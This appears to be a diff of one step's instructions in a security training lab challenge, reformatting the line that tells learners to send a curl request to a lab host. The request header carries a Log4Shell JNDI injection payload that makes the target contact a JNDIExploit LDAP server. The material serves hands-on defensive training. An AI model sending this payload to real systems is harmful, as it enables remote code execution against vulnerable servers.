deep-security/tdc-2022-techday-2/challenges/file_storage_security/wording/src/task04/main.md

 [+] HTTP Server Start Listening on 9001...

-To test to make sure it’s running correctly, open another Terminal Emulator window and run the following command, where YOURIP is your local IP: "curl http://sudosingles-optimizer -H 'X-Api-Version: ${jndi:ldap://YOURIP:1389/Basic/SpringEcho}'"
+To test to make sure it’s running correctly, open another Terminal Emulator window and run the following command, where YOURIP is your local IP:

+curl http://sudosingles-optimizer -H 'X-Api-Version: ${jndi:ldap://YOURIP:1389/Basic/SpringEcho}'

 To complete this challenge, after you run the above command, enter the last line generated in the Terminal Emulator window where JNDIExploit is running, and hit “Submit.”
 If your answer doesn’t submit, double-check all the above steps.
 It could mean that something is wrong with the server command.